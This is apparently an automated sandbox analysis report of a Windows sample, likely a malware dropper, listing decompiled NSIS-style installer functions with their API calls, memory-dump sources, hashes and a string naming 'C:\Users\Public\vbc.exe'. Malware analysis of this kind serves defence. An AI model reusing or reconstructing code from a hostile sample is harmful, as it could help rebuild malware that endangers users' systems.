                                                                                                                                                                                                              0x00406521
                                                                                                                                                                                                              0x00406521
                                                                                                                                                                                                              0x00406527
                                                                                                                                                                                                              0x00406534
                                                                                                                                                                                                              0x00406534
                                                                                                                                                                                                              0x00406535
                                                                                                                                                                                                              0x00406537
                                                                                                                                                                                                              0x0040653b
                                                                                                                                                                                                              0x0040653d
                                                                                                                                                                                                              0x00406546
                                                                                                                                                                                                              0x00406548
                                                                                                                                                                                                              0x00406562
                                                                                                                                                                                                              0x0040656a
                                                                                                                                                                                                              0x0040656a
                                                                                                                                                                                                              0x0040656f
                                                                                                                                                                                                              0x00406571
                                                                                                                                                                                                              0x00406573
                                                                                                                                                                                                              0x00406577
                                                                                                                                                                                                              0x00406578
                                                                                                                                                                                                              0x0040657b
                                                                                                                                                                                                              0x00406583
                                                                                                                                                                                                              0x00406585
                                                                                                                                                                                                              0x00406589
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040658f
                                                                                                                                                                                                              0x00406594
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406594
                                                                                                                                                                                                              0x00406599

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                              • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                              • API String ID: 589700163-1374994687
                                                                                                                                                                                                              • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                                                                                                              • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                                                              				struct tagLOGBRUSH _v16;
                                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                                              				signed char _t50;
                                                                                                                                                                                                              				long* _t54;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                                                                              					L18:
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                                                                                                              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t50 = _t54[5];
                                                                                                                                                                                                              					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                                                                                                              						goto L18;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t39 =  *_t54;
                                                                                                                                                                                                              					if((_t50 & 0x00000002) != 0) {
                                                                                                                                                                                                              						_t39 = GetSysColor(_t39);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                                                                                                              						SetTextColor(_a8, _t39);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					SetBkMode(_a8, _t54[4]);
                                                                                                                                                                                                              					_t41 = _t54[1];
                                                                                                                                                                                                              					_v16.lbColor = _t41;
                                                                                                                                                                                                              					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                                                                                                              						_t41 = GetSysColor(_t41);
                                                                                                                                                                                                              						_v16.lbColor = _t41;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                                                                                                              						SetBkColor(_a8, _t41);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                                                                                                              						_v16.lbStyle = _t54[2];
                                                                                                                                                                                                              						_t44 = _t54[3];
                                                                                                                                                                                                              						if(_t44 != 0) {
                                                                                                                                                                                                              							DeleteObject(_t44);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					return _t54[3];
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}









                                                                                                                                                                                                              0x00404325
                                                                                                                                                                                                              0x004043db
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004043db
                                                                                                                                                                                                              0x00404336
                                                                                                                                                                                                              0x0040433a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404354
                                                                                                                                                                                                              0x00404354
                                                                                                                                                                                                              0x0040435d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040435f
                                                                                                                                                                                                              0x0040436b
                                                                                                                                                                                                              0x0040436e
                                                                                                                                                                                                              0x0040436e
                                                                                                                                                                                                              0x00404374
                                                                                                                                                                                                              0x0040437a
                                                                                                                                                                                                              0x0040437a
                                                                                                                                                                                                              0x00404386
                                                                                                                                                                                                              0x0040438c
                                                                                                                                                                                                              0x00404393
                                                                                                                                                                                                              0x00404396
                                                                                                                                                                                                              0x00404399
                                                                                                                                                                                                              0x0040439b
                                                                                                                                                                                                              0x0040439b
                                                                                                                                                                                                              0x004043a3
                                                                                                                                                                                                              0x004043a9
                                                                                                                                                                                                              0x004043a9
                                                                                                                                                                                                              0x004043b3
                                                                                                                                                                                                              0x004043b8
                                                                                                                                                                                                              0x004043bb
                                                                                                                                                                                                              0x004043c0
                                                                                                                                                                                                              0x004043c3
                                                                                                                                                                                                              0x004043c3
                                                                                                                                                                                                              0x004043d3
                                                                                                                                                                                                              0x004043d3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004043d6

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                              • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                                                                              • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E0040534F(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                              				CHAR* _v32;
                                                                                                                                                                                                              				long _v44;
                                                                                                                                                                                                              				int _v48;
                                                                                                                                                                                                              				void* _v52;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                              				CHAR* _t28;
                                                                                                                                                                                                              				long _t29;
                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t26 =  *0x423f24; // 0x0
                                                                                                                                                                                                              				_v8 = _t26;
                                                                                                                                                                                                              				if(_t26 != 0) {
                                                                                                                                                                                                              					_t27 =  *0x424814;
                                                                                                                                                                                                              					_v12 = _t27;
                                                                                                                                                                                                              					_t39 = _t27 & 0x00000001;
                                                                                                                                                                                                              					if(_t39 == 0) {
                                                                                                                                                                                                              						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t26 = lstrlenA(0x420530);
                                                                                                                                                                                                              					_a4 = _t26;
                                                                                                                                                                                                              					if(_a8 == 0) {
                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                              						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                                                                              							_t26 = SetWindowTextA( *0x423f08, 0x420530);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                                                                              							_v32 = 0x420530;
                                                                                                                                                                                                              							_v52 = 1;
                                                                                                                                                                                                              							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                                                                                                              							_v44 = 0;
                                                                                                                                                                                                              							_v48 = _t29 - _t39;
                                                                                                                                                                                                              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                                                                                                                              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                                                              							_t28 = _a4;
                                                                                                                                                                                                              							 *((char*)(_t28 + 0x420530)) = 0;
                                                                                                                                                                                                              							return _t28;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                                                                                                              						if(_t26 < 0x800) {
                                                                                                                                                                                                              							_t26 = lstrcatA(0x420530, _a8);
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t26;
                                                                                                                                                                                                              			}

















                                                                                                                                                                                                              0x00405355
                                                                                                                                                                                                              0x00405361
                                                                                                                                                                                                              0x00405364
                                                                                                                                                                                                              0x0040536a
                                                                                                                                                                                                              0x00405376
                                                                                                                                                                                                              0x00405379
                                                                                                                                                                                                              0x0040537c
                                                                                                                                                                                                              0x00405382
                                                                                                                                                                                                              0x00405382
                                                                                                                                                                                                              0x00405388
                                                                                                                                                                                                              0x00405390
                                                                                                                                                                                                              0x00405393
                                                                                                                                                                                                              0x004053b0
                                                                                                                                                                                                              0x004053b4
                                                                                                                                                                                                              0x004053bd
                                                                                                                                                                                                              0x004053bd
                                                                                                                                                                                                              0x004053c7
                                                                                                                                                                                                              0x004053d0
                                                                                                                                                                                                              0x004053dc
                                                                                                                                                                                                              0x004053e3
                                                                                                                                                                                                              0x004053e7
                                                                                                                                                                                                              0x004053ea
                                                                                                                                                                                                              0x004053fd
                                                                                                                                                                                                              0x0040540b
                                                                                                                                                                                                              0x0040540b
                                                                                                                                                                                                              0x0040540f
                                                                                                                                                                                                              0x00405411
                                                                                                                                                                                                              0x00405414
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405414
                                                                                                                                                                                                              0x00405395
                                                                                                                                                                                                              0x0040539d
                                                                                                                                                                                                              0x004053a5
                                                                                                                                                                                                              0x004053ab
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004053ab
                                                                                                                                                                                                              0x004053a5
                                                                                                                                                                                                              0x00405393
                                                                                                                                                                                                              0x0040541e

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                                                                                                                                                              • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004053E3
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004053FD
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 0040540B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                                                                              • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                                                                                                                                                                              • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00402E52(intOrPtr _a4) {
                                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                                              				long _t6;
                                                                                                                                                                                                              				struct HWND__* _t7;
                                                                                                                                                                                                              				struct HWND__* _t15;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                                              					_t15 =  *0x41f904;
                                                                                                                                                                                                              					if(_t15 != 0) {
                                                                                                                                                                                                              						_t15 = DestroyWindow(_t15);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *0x41f904 = 0;
                                                                                                                                                                                                              					return _t15;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if( *0x41f904 != 0) {
                                                                                                                                                                                                              					return E0040666D(0);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t6 = GetTickCount();
                                                                                                                                                                                                              				if(_t6 >  *0x424750) {
                                                                                                                                                                                                              					if( *0x424748 == 0) {
                                                                                                                                                                                                              						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
                                                                                                                                                                                                              						 *0x41f904 = _t7;
                                                                                                                                                                                                              						return ShowWindow(_t7, 5);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(( *0x424814 & 0x00000001) != 0) {
                                                                                                                                                                                                              						wsprintfA( &_v68, "... %d%%", E00402E36());
                                                                                                                                                                                                              						return E0040534F(0,  &_v68);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t6;
                                                                                                                                                                                                              			}







                                                                                                                                                                                                              0x00402e5e
                                                                                                                                                                                                              0x00402e60
                                                                                                                                                                                                              0x00402e67
                                                                                                                                                                                                              0x00402e6a
                                                                                                                                                                                                              0x00402e6a
                                                                                                                                                                                                              0x00402e70
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402e70
                                                                                                                                                                                                              0x00402e7e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402e81
                                                                                                                                                                                                              0x00402e88
                                                                                                                                                                                                              0x00402e94
                                                                                                                                                                                                              0x00402e9c
                                                                                                                                                                                                              0x00402eda
                                                                                                                                                                                                              0x00402ee3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402ee8
                                                                                                                                                                                                              0x00402ea5
                                                                                                                                                                                                              0x00402eb6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402ec4
                                                                                                                                                                                                              0x00402ea5
                                                                                                                                                                                                              0x00402ef0

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00402E6A
                                                                                                                                                                                                              • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040306B), ref: 00402E88
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00402EB6
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                                                                                                                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                                                                                                                                                • Part of subcall function 00402E36: MulDiv.KERNEL32 ref: 00402E4B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                                                                                              • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                                                                                                                                                                              • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                                              				signed char _v12;
                                                                                                                                                                                                              				unsigned int _v16;
                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                              				long _v56;
                                                                                                                                                                                                              				void* _v60;
                                                                                                                                                                                                              				long _t15;
                                                                                                                                                                                                              				unsigned int _t19;
                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                              				struct HWND__* _t28;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t28 = _a4;
                                                                                                                                                                                                              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                              					_v56 = _t15;
                                                                                                                                                                                                              					_v60 = 4;
                                                                                                                                                                                                              					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                                                                                                              					return _v24;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t19 = GetMessagePos();
                                                                                                                                                                                                              				_v16 = _t19 >> 0x10;
                                                                                                                                                                                                              				_v20 = _t19;
                                                                                                                                                                                                              				ScreenToClient(_t28,  &_v20);
                                                                                                                                                                                                              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                                                                              				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                                                                              					_t15 = _v8;
                                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t25 | 0xffffffff;
                                                                                                                                                                                                              			}














                                                                                                                                                                                                              0x00404c0d
                                                                                                                                                                                                              0x00404c1a
                                                                                                                                                                                                              0x00404c20
                                                                                                                                                                                                              0x00404c5e
                                                                                                                                                                                                              0x00404c5e
                                                                                                                                                                                                              0x00404c6d
                                                                                                                                                                                                              0x00404c74
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404c76
                                                                                                                                                                                                              0x00404c22
                                                                                                                                                                                                              0x00404c31
                                                                                                                                                                                                              0x00404c39
                                                                                                                                                                                                              0x00404c3c
                                                                                                                                                                                                              0x00404c4e
                                                                                                                                                                                                              0x00404c54
                                                                                                                                                                                                              0x00404c5b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404c5b
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                                                              • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405815(CHAR* _a4) {
                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                                                                                              				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                                                                                              				_v36.Owner = 0x408384;
                                                                                                                                                                                                              				_v36.Group = 0x408384;
                                                                                                                                                                                                              				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                                                                                              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                                                                                              				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                                                                                              				_v36.Revision = 1;
                                                                                                                                                                                                              				_v36.Control = 4;
                                                                                                                                                                                                              				_v36.Dacl = 0x408374;
                                                                                                                                                                                                              				_v16.nLength = 0xc;
                                                                                                                                                                                                              				if(CreateDirectoryA(_a4,  &_v16) != 0) {
                                                                                                                                                                                                              					L1:
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t23 = GetLastError();
                                                                                                                                                                                                              				if(_t23 == 0xb7) {
                                                                                                                                                                                                              					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t23;
                                                                                                                                                                                                              			}






                                                                                                                                                                                                              0x00405820
                                                                                                                                                                                                              0x00405824
                                                                                                                                                                                                              0x00405827
                                                                                                                                                                                                              0x0040582d
                                                                                                                                                                                                              0x00405831
                                                                                                                                                                                                              0x00405835
                                                                                                                                                                                                              0x0040583d
                                                                                                                                                                                                              0x00405844
                                                                                                                                                                                                              0x0040584a
                                                                                                                                                                                                              0x00405851
                                                                                                                                                                                                              0x00405860
                                                                                                                                                                                                              0x00405862
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405862
                                                                                                                                                                                                              0x0040586c
                                                                                                                                                                                                              0x00405873
                                                                                                                                                                                                              0x00405889
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040588b
                                                                                                                                                                                                              0x0040588f

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040586C
                                                                                                                                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040588B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\Public, xrefs: 00405815
                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
